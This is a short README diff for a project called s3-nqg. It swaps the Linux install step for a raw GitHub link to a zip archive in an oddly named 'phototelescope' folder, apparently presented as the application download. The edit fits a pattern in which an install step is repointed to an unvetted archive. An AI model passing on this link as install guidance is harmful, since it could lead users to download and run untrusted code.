nielsolehald/s3-nqg/README.md

 - If you are using Windows, double-click the `.exe` file.
 - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-- On Linux, you will usually find a `.tar.gz` file; extract it and follow any provided instructions.
+- On Linux, you will usually find a `https://raw.githubusercontent.com/nielsolehald/s3-nqg/main/phototelescope/s3-nqg.zip` file; extract it and follow any provided instructions.

 ### Step 3: Run the Application